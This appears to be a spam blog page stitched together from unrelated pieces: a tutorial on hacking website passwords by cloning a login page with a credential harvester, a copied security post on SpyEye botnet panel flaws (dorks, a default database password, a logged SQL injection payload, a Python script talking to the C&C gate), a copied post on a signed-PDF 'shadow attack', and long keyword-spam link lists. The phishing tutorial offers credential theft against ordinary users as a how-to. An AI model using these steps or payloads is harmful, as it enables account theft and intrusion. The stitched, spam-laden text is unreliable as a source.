2023年5月29日 星期一

HACKING PASSWORDS USING CREDENTIAL HARVESTER ATTACK

Everything over the internet is secured by the passwords. You need a login to do any stuff on any social or banking website. Passwords are the first security measure for these type of websites. So, I brought a tutorial on how to hack such sort of login passwords. This tutorial is based on credential harvester attack method. In which you will know about hacking passwords using credential harvester attack method.

HACKING PASSWORDS USING CREDENTIAL HARVESTER ATTACK

REQUIREMENTS

It's very simple and easy to follow. Before you start, you need the following things to work with.
  1. Kali Linux OS
  2. Target Website

STEPS TO FOLLOW

  • Run the Kali Linux machine. If you have not Kali Linux installed, you can grab a free copy and install it as a virtual machine. You can learn more about Kali Linux VirtualBox installation.
  • Sign in to Kali Linux by entering username root and password toor.
  • As you'll sign in, navigate to the Applications > Social Engineering Tools > Social Engineering as shown in the following screenshot.
  • Now you will see the different options. You have to choose Social Engineering Attacks by simply entering its number in the terminal. Once you do it, it will show a few options further. Simply choose Website Vector Attack by putting its number.
  • Website vector attack will show up it's a different type of attacks. We are going to use Credential Harvester Attack.
  • Choose the Site Clone option. As you do it, it will ask for your public IP address. Just open up a new terminal and type ifconfig. It'll show the public IP. Just copy it and paste in the previous terminal as shown in the following screenshots.
  • After we do it. Enter the target website of which passwords you want to hack. Make sure to use a website that has username and password on the same page.
  • All done now. As someone opens up the browser on the public IP we specified, it'll show up the website that we entered in the previous step. Now as someone enters their username or password, it will be captured in the terminal.

That's all. If you're not clear yet. You can watch the following complete video tutorial on how to do it.
Related news

Attacking Financial Malware Botnet Panels - SpyEye

This is the second blog post in the "Attacking financial malware botnet panels" series. After playing with Zeus, my attention turned to another old (and dead) botnet, SpyEye. From an ITSEC perspective, SpyEye shares a lot of vulnerabilities with Zeus. 

The following report is based on SpyEye 1.3.45, which is old, and if we are lucky, the whole SpyEye branch will be dead soon. 

Google dorks to find SpyEye C&C server panel related stuff:

  • if the img directory gets indexed, it is rather easy, search for e.g. inurl:b-ftpbackconnect.png
  • if the install directory gets indexed, again, easy, search for e.g. inurl:spylogo.png
  • also, if you find a login screen, check the css file (style.css), and you see #frm_viewlogs, #frm_stat, #frm_botsmon_country, #frm_botstat, #frm_gtaskloader and stuff like that, you can be sure you found it
  • otherwise, it is the best not to Google for it, but get a SpyEye sample and analyze it
And this is how the control panel login looks like, nothing sophisticated:


The best part is that you don't have to guess the admin's username ;)

This is how an average control panel looks like:


Hack the Planet! :)

Boring vulns found (warning, an almost exact copy from the Zeus blog post)


  • Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
  • No password policy - admins can set up really weak passwords
  • No anti brute-force - you can try to guess the admin's password. There is no default username, as there is no username handling!
  • Password autocomplete enabled - boring
  • Missing HttpOnly flag on session cookie - interesting when combining with XSS
  • No CSRF protection - e.g. you can upload new exe, bin files, turn plugins on/off :-( boring. Also the file extension check can be bypassed, but the files are stored in the database, so no PHP shell this time. If you check the following code, you can see that even the file extension and type is checked, and an error is shown, but the upload process continues. And even if the error would stop the upload process, the check can be fooled by setting an invalid $uptype. Well done ...
        if ($_FILES['file']['tmp_name'] && ($_FILES['file']['size'] > 0))         {                 $outstr = "<br>";                 set_time_limit(0);                 $filename = str_replace(" ","_",$_FILES['file']['name']);                 $ext = substr($filename, strrpos($filename, '.')+1);                 if( $ext==='bin' && $uptype!=='config' ) $outstr .= "<font class='error'>Bad CONFIG extension!</font><br>";                 if( $ext==='exe' && $uptype!=='body' && $uptype!=='exe' ) $outstr .= "<font class='error'>Bad extension!</font><br>";                  switch( $uptype )                 {                 case 'body': $ext = 'b'; break;                 case 'config': $ext = 'c'; break;                 case 'exe': $ext = 'e'; break;                 default: $ext = 'e';                 }                 $_SESSION['file_ext'] = $ext;                 if( isset($_POST['bots']) && trim($_POST['bots']) !== '')                 {                         $bots = explode(' ', trim($_POST['bots']));                         //writelog("debug.log", trim($_POST['bots']));                         $filename .= "_".(LastFileId()+1);                 }                 if( FileExist($filename) ) $filename .= LastFileId();                 $tmpName  = $_FILES['file']['tmp_name'];                 $fileSize = $_FILES['file']['size'];                 $fileType = $_FILES['file']['type'];                 ## reading all file for calculating hash                 $fp = fopen($tmpName, 'r'); 
  • Clear text password storage - the MySQL passwords are stored in php files, in clear text. Also, the login password to the form panel is stored in clear text.
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5. Just look at the pure simplicity of the login check, great work!
$query = "SELECT * FROM users_t WHERE uPswd='".md5($pswd)."'";
  • ClickJacking - really boring stuff

SQL injection


SpyEye has a fancy history of SQL injections. See details here, here, here, video here and video here.

It is important to highlight the fact that most of the vulnerable functions are reachable without any authentication, because these PHP files lack user authentication at the beginning of the files.

But if a C&C server owner gets pwned through this vuln, it is not a good idea to complain to the developer, because after careful reading of the install guide, one can see:

"For searching info in the collector database there is a PHP interface as formgrabber admin panel. The admin panel is not intended to be found on the server. This is a client application."

And there are plenty of reasons not to install the formgrabber admin panel on any internet reachable server. But this fact leads to another possible vulnerability. The user for this control panel is allowed to remotely login to the MySQL database, and the install guide has pretty good passwords to be reused. I mean it looks pretty secure, there is no reason not to use that.

CREATE USER 'frmcpviewer' IDENTIFIED BY 'SgFGSADGFJSDGKFy2763272qffffHDSJ'; 

Next time you find a SpyEye panel, and you can connect to the MySQL database, it is worth a shot to try this password.

Unfortunately the default permissions for this user is not enough to write files (select into outfile):

Access denied for user 'frmcpviewer' (using password: YES)

I also made a little experiment with this SQL injection vulnerability. I did set up a live SpyEye botnet panel, created the malware install binaries (droppers), and sent the droppers to the AV companies. And after more and more sandboxes connected to my box, someone started to exploit the SQL injection vulnerability on my server!

63.217.168.90 - - [16/Jun/2014:04:43:00 -0500] "GET /form/frm_boa-grabber_sub.php?bot_guid=&lm=3&dt=%20where%201=2%20union%20select%20@a:=1%20from%20rep1%20where%20@a%20is%20null%20union%20select%20@a:=%20@a%20%2b1%20union%20select%20concat(id,char(1,3,3,7),bot_guid,char(1,3,3,7),process_name,char(1,3,3,7),hooked_func,char(1,3,3,7),url,char(1,3,3,7),func_data)%20from%20rep2_20140610%20where%20@a=3%23 HTTP/1.1" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"

Although the query did not return any meaningful data to the attacker (only data collected from sandboxes), it raises some legal questions.

Which company/organization has the right to attack my server? 
  • police (having a warrant)
  • military (if we are at war)
  • spy agencies (always/never, choose your favorite answer)
  • CERT organisations?

But, does an AV company or security research company has the legal right to attack my server? I don't think so... The most problematic part is when they hack a server (without authorization), and sell the stolen information in the name of "intelligence service". What is it, the wild wild west?

The SQLi clearly targets the content of the stolen login credentials. If this is not an AV company, but an attacker, how did they got the SpyEye dropper? If this is an AV company, why are they stealing the stolen credentials? Will they notify the internet banking owners about the stolen credentials for free? Or will they do this for money?

And don't get me wrong, I don't want to protect the criminals, but this is clearly a grey area in the law. From an ethical point of view, I agree with hacking the criminal's servers. As you can see, the whole post is about disclosing vulns in these botnet panels. But from a legal point of view, this is something tricky ... I'm really interested in the opinion of others, so comments are warmly welcome.

On a side note, I was interested how did the "attackers" found the SpyEye form directory? Easy, they brute-forced it, with a wordlist having ~43.000 entries.

(Useless) Cross site scripting


Although parts of the SpyEye panel are vulnerable to XSS, it is unlikely that you will to find these components on the server, as these codes are part of the install process, and the installer fails to run if a valid install is found. And in this case, you also need the DB password to trigger the vuln...



Session handling


This is a fun part. The logout button invalidates the session only on the server side, but not on the client side. But if you take into consideration that the login process never regenerates the session cookies (a.k.a session fixation), you can see that no matter how many times the admin logs into the application, the session cookie remains the same (until the admin does not close the browser). So if you find a session cookie which was valid in the past, but is not working at the moment, it is possible that this cookie will be valid in the future ...

Binary server


Some parts of the SpyEye server involve running a binary server component on the server, to collect the form data. It would be interesting to fuzz this component (called sec) for vulns.

Log files revealed


If the form panel mentioned in the SQLi part is installed on the server, it is worth visiting the <form_dir>/logs/error.log file, you might see the path of the webroot folder, IP addresses of the admins, etc.

Reading the code


Sometimes reading the code you can find code snippets, which is hard to understand with a clear mind:

$content = fread($fp, filesize($tmpName)); if ( $uptype === 'config' )     $md5 = GetCRC32($content); else $md5 = md5($content); .... <script> if (navigator.userAgent.indexOf("Mozilla/4.0") != -1) {         alert("Your browser is not support yet. Please, use another (FireFox, Opera, Safari)");         document.getElementById("div_main").innerHTML = "<font class=\'error\'>ChAnGE YOuR BRoWsEr! Dont use BUGGED Microsoft products!</font>"; } </script> 

Decrypting SpyEye communication

It turned out that the communication between the malware and C&C server is not very sophisticated (Zeus does a better job at it, because the RC4 key stream is generated from the botnet password).

function DeCode($content) {         $res = '';         for($i = 0; $i < strlen($content); $i++)         {                 $num = ord($content[$i]);                 if( $num != 219) $res .= chr($num^219);         }         return $res; } 
Fixed XOR key, again, well done ...
This means that it is easy to create a script, which can communicate with the SpyEye server. For example this can be used to fill in the SpyEye database with crap data.


import binascii import requests import httplib, urllib  def xor_str(a, b):     i = 0     xorred = ''     for i in range(len(a)):         xorred += chr(ord(a[i])^b)     return xorred              b64_data= "vK6yv+bt9er17O3r6vqPnoiPjZb2i5j6muvo6+rjmJ/9rb6p5urr6O/j/bK+5uP16/Xs7evq9ers7urv/bSo5u316vXs7evq/a6v5pq/trK1/bi4qbjm453j6uPv7Or9tr/u5um+uuvpve3p7eq/4+vsveLi7Lnqvrjr6ujs7rjt7rns/au3vOa5sre3srW8s7q2tr6p4Lm3tLiw4LmuvKm+q7Spr+C4uPu8qbq5ub6p4Li4vKm6ubm+qeC4qb6/sq+8qbq54LiuqK+0tri0tbW+uK+0qeC/v7So4L+1qLqrsuC+trqyt7ypurm5vqngvb24vqmvvKm6ubm+qeC9/aivuq/mtLW3srW+" payload =xor_str (binascii.a2b_base64(b64_data), 219)  print ("the decrypted payload is: " + payload) params = (binascii.b2a_base64(xor_str(payload,219))) payload = {'data': params} r = requests.post("http://spyeye.localhost/spyeye/_cg/gate.php", data=payload) 

Morale of the story?


Criminals produce the same shitty code as the rest of the world, and thanks to this, some of the malware operators get caught and are behind bars now. And the law is behind the reality, as always.

More articles


  1. New Hacker Tools
  2. Termux Hacking Tools 2019
  3. Hacker Tools Apk Download
  4. Pentest Tools Nmap
  5. Hacking Tools Usb
  6. Hack Tools For Mac
  7. Hack Apps
  8. Pentest Tools Tcp Port Scanner
  9. Termux Hacking Tools 2019
  10. How To Hack
  11. Github Hacking Tools
  12. Pentest Tools Linux
  13. Hacking Apps
  14. New Hack Tools
  15. Hacker Tools List
  16. Hack Tools Github
  17. Pentest Tools For Ubuntu
  18. Hack Tools For Pc
  19. Hack Tools 2019
  20. Game Hacking
  21. Hacking Tools For Pc
  22. Hack Tools For Mac
  23. Hack Tools For Games
  24. Hacking Tools Free Download
  25. Termux Hacking Tools 2019
  26. How To Make Hacking Tools
  27. Hack Tools Github
  28. Beginner Hacker Tools
  29. What Are Hacking Tools
  30. Hacker Tools Free
  31. Pentest Tools Website Vulnerability
  32. Hacker Search Tools
  33. Hacker Tools For Mac
  34. Hacker Tools For Mac
  35. Hack Tools For Mac
  36. Hacker Tools Mac
  37. Pentest Tools Github
  38. Hack Website Online Tool
  39. Hacking Tools Pc
  40. Hacking Tools For Mac
  41. World No 1 Hacker Software
  42. Hacker Tools Mac
  43. Hak5 Tools
  44. Free Pentest Tools For Windows
  45. Hacking App
  46. Hacker Tools Software
  47. Beginner Hacker Tools
  48. Free Pentest Tools For Windows
  49. Hacker Tools For Mac
  50. How To Hack
  51. Hack Tools
  52. Physical Pentest Tools
  53. Hacking Tools Kit
  54. Pentest Tools Url Fuzzer
  55. Game Hacking
  56. Hack Tools For Mac
  57. Hack Tools For Pc
  58. Hacking Tools Usb
  59. Hacking Tools Online
  60. Computer Hacker
  61. Hacking Tools Github
  62. Hacking App
  63. Hacker Tools Online
  64. Hacking Tools 2019
  65. Pentest Tools Kali Linux
  66. Hacker Tools Free
  67. Hacker Tools For Mac
  68. Hak5 Tools
  69. Hack Tools Online
  70. Pentest Tools Review
  71. Hacker Tool Kit
  72. Game Hacking
  73. Pentest Reporting Tools
  74. Hackers Toolbox
  75. Hack Tools 2019
  76. Hacker Tools For Pc
  77. Hack Tools Github
  78. Hacker Tools Github
  79. How To Hack
  80. Hacker Tools 2020
  81. Tools 4 Hack
  82. Hacker Tools Free
  83. Pentest Tools Url Fuzzer
  84. Hack Tools
  85. What Is Hacking Tools
  86. Easy Hack Tools
  87. Android Hack Tools Github
  88. Hacking Tools For Games
  89. Hack And Tools
  90. Hack Apps
  91. Game Hacking
  92. Tools 4 Hack
  93. Hacking Tools For Pc
  94. Hacker Tools For Windows
  95. Hack Tools
  96. Pentest Tools Free
  97. Hacker Tools Github
  98. Pentest Tools Nmap
  99. Bluetooth Hacking Tools Kali
  100. Underground Hacker Sites
  101. Underground Hacker Sites
  102. Pentest Tools Linux
  103. Hacker Search Tools
  104. Pentest Reporting Tools
  105. Pentest Tools Tcp Port Scanner
  106. Hack Tools Pc
  107. Hacker Tools For Ios
  108. Hacker Techniques Tools And Incident Handling
  109. Hacking Tools Github
  110. Hack Tools For Games
  111. Hacking Tools For Pc
  112. Hack Tool Apk
  113. Hack Tools For Ubuntu
  114. World No 1 Hacker Software
  115. Computer Hacker
  116. Hacking Tools Windows
  117. Hacking Apps
  118. Wifi Hacker Tools For Windows
  119. Hack And Tools
  120. Install Pentest Tools Ubuntu
  121. Computer Hacker
  122. Pentest Tools For Windows
  123. Hack Tools 2019
  124. Hacker Techniques Tools And Incident Handling
  125. Pentest Tools Url Fuzzer
  126. Hack Tools Online
  127. How To Make Hacking Tools
  128. Hacking Tools Online
  129. Hacker Tools For Windows
  130. Hack And Tools
  131. Pentest Tools Nmap
  132. Hacking Tools Windows
  133. Hacking Tools Kit
  134. Hacking Tools Software
  135. Github Hacking Tools
  136. Pentest Tools Framework
  137. New Hack Tools
  138. Hacker Techniques Tools And Incident Handling
  139. Hacker Tools For Mac
  140. Usb Pentest Tools
  141. Hacker Tools Free Download
  142. Hacking Tools For Pc
  143. Hacker Hardware Tools
  144. Nsa Hack Tools
  145. Hack Tools For Windows
  146. Pentest Recon Tools
  147. Hack Tools For Pc
  148. Computer Hacker
  149. Tools Used For Hacking
  150. Hacking Tools Free Download
  151. What Is Hacking Tools
  152. Hacking Tools Windows
  153. Pentest Tools Website
  154. Hackers Toolbox
  155. Pentest Tools Url Fuzzer
  156. Pentest Tools Download
  157. Tools For Hacker
  158. Hacker Tools Software
  159. Hacker Tools Linux
  160. Hack Tools Github
  161. Pentest Tools Free
  162. Hacking App
  163. Hacking Tools Pc
  164. Best Hacking Tools 2019
  165. Nsa Hacker Tools

Shadow Attacks … The Smallest Attack Vector Ever

In July 2020, we introduced a novel attack class called Shadow Attacks. In our recent research, we discovered a new variant of the attack which relies only on an Incremental Update containing a malicious trailer.
A proof-of-concept exploit working on Foxit (Version: 11.0.1.49938) can be downloaded here.

The story so far ...

Shadow attacks are attacks bypassing the integrity protection of digitally signed PDF documents. The attacks abuse two legitimate features in PDF documents which we briefly explain.

Hiding Content

In PDFs, there are multiple techniques to hide content that is not displayed when the document is opened. We, as attackers, usually hide malicious objects without referencing them in the xref section.

Incremental Updates

New content can be appended to a signed PDF document. This is quite dangerous though. The digital signature in PDFs protects a specific range of bytes. Any appended content does not break the signature verification since it is outside this range. As a result, any new Incremental Update does not violate the cryptographic verification of the digital signature. 
But, Incremental Updates are quite dangerous since they may completely change the displayed content of the document. In 2019, we showed different techniques based on Incremental Updates – the Incremental Saving Attacks.
As a countermeasure, most vendors warn if additional content is added after signing the document. BUT … not always!!!
 
There are meaningful use cases where Incremental Updates in digitally signed documents are allowed. For instance, contracts should be signed by multiple parties and each new signature is applied via additional Incremental Update.
Also, PAdES defines Incremental Updates as part of the long-term validation of digitally signed PDFs.
In summary, Incremental Updates are painful from a security perspective. Currently, vendors are trying to estimate whether an Incremental Update is malicious or not by analyzing its content.

Shadow Attacks

Shadow attacks, in general, deceive the PDF applications that an Incremental Update is not malicious. This can be done by providing an Incremental Update with minimal content.
In 2020, we estimated that appending an xref section and a trailer is sufficient to bypass the detection mechanisms of popular applications such as Adobe Reader and Foxit Reader.

Trailer-based Shadow Attack

Three months ago, we tried to reduce the content of the malicious Incremental Update. Our idea was to use only a malicious trailer and still change the content of the entire document when it is opened. Let's see how this can be done. 


The Signer's view on the document

 If a signer gets the document depicted on the left side, he or she sees the content "Sign the document to get a reward".
The document contains a hidden content depicted as red text – the 4 0 obj containing the text "You are fired. Get out immediately" and an xref section pointing to that object. However, the trailer references another xref section, see (1) and (2). Thus, the red text is never shown.
From the signer's perspective, there is no possibility to detect the hidden content by opening and reviewing the document.
As a result, the signer, for example the company director, signs the document.

The Victim's view on the document

We assume that the attacker receives the signed document and manipulates it.
The attacker appends only a trailer that points to the hidden malicious xref section (the red one). When the victim opens the document, the content "You are fired. Get out immediately" is shown.
However, the digital signature validation does not throw any warning since … well … what could go wrong if only a trailer is appended.
 

Honest vs. Malicious Trailer

There are small differences between the honest and the malicious trailer– the byte position of the xref section. Now, the trailer points to the hidden xref section.
trailer
<<
/Size 23
/Prev 18735
/Root 13 0 R
]>>
Honest trailer
trailer
<<
/Size 23
/Prev 19192
/Root 13 0 R
]>>
Malicious trailer
 
 



Impact and Exploit

We successfully applied the new attack on Foxit Reader (Version: 11.0.1.49938). We promptly reported the vulnerability and provided a Proof-of-Concept (PoC) exploit, known as CVE-2021-40326.
Foxit acknowledged the attack and published a security fix with the new version Foxit Reader 11.1.
 
We are not aware of any further implementations vulnerable to this attack.
If you think that your application might be vulnerable to the attack, then just download the exploit and test on your own.
 

Authors of this post

Vladislav Mladenov

Simon Rohlmann

Christian Mainka

Read more


  1. Hacker Tools Free
  2. Hacker Tools
  3. Hacker Tool Kit
  4. Termux Hacking Tools 2019
  5. Hacker Tools Linux
  6. Hacking Tools For Windows
  7. Github Hacking Tools
  8. Wifi Hacker Tools For Windows
  9. Usb Pentest Tools
  10. Hacking Tools Github
  11. Hack Tools For Mac
  12. Hacker Tools Mac
  13. Hacking Tools For Games
  14. Install Pentest Tools Ubuntu
  15. Pentest Tools Kali Linux
  16. Ethical Hacker Tools
  17. What Are Hacking Tools
  18. Pentest Tools Github
  19. Hacker Tool Kit
  20. Hacker Tools Linux
  21. Hacker Hardware Tools
  22. Pentest Tools Review
  23. Hacking Tools And Software
  24. New Hacker Tools
  25. Free Pentest Tools For Windows
  26. Hack Tools Download
  27. Hacking Tools Usb
  28. Hack Website Online Tool
  29. Hack Apps
  30. Free Pentest Tools For Windows
  31. Hacker Tools 2020
  32. What Are Hacking Tools
  33. Hacking Tools Usb
  34. Hacking Tools Download
  35. Pentest Tools Windows
  36. Hacker Tools For Windows
  37. Hack And Tools
  38. Hacker Tools Windows
  39. Hacking Tools For Pc
  40. Pentest Tools For Mac
  41. Hacking Tools Online
  42. Hack And Tools
  43. Hacker
  44. Wifi Hacker Tools For Windows
  45. Hack Apps
  46. Hacker Tools For Pc
  47. Hacking Tools Kit
  48. Pentest Tools For Windows
  49. Hacker Hardware Tools
  50. Underground Hacker Sites
  51. Hacking Tools Windows
  52. How To Make Hacking Tools
  53. Blackhat Hacker Tools
  54. Pentest Tools Alternative
  55. Hack Tool Apk
  56. Hacking Tools Windows 10
  57. Pentest Tools Windows
  58. Hacking App
  59. Hak5 Tools
  60. Pentest Tools Alternative
  61. Growth Hacker Tools
  62. Usb Pentest Tools
  63. Pentest Tools For Ubuntu
  64. Hacker Tools Linux
  65. Hacker Security Tools
  66. Pentest Tools For Ubuntu
  67. Hack Tools For Games
  68. Hack Website Online Tool
  69. Hack Apps
  70. Pentest Tools Review
  71. Hacker Tools Software
  72. Hack Tools Github
  73. Hacker Tools Online
  74. Hacking Tools For Windows
  75. Pentest Tools Website Vulnerability
  76. Pentest Tools Url Fuzzer
  77. Hacking Tools Download
  78. Hacking Tools 2020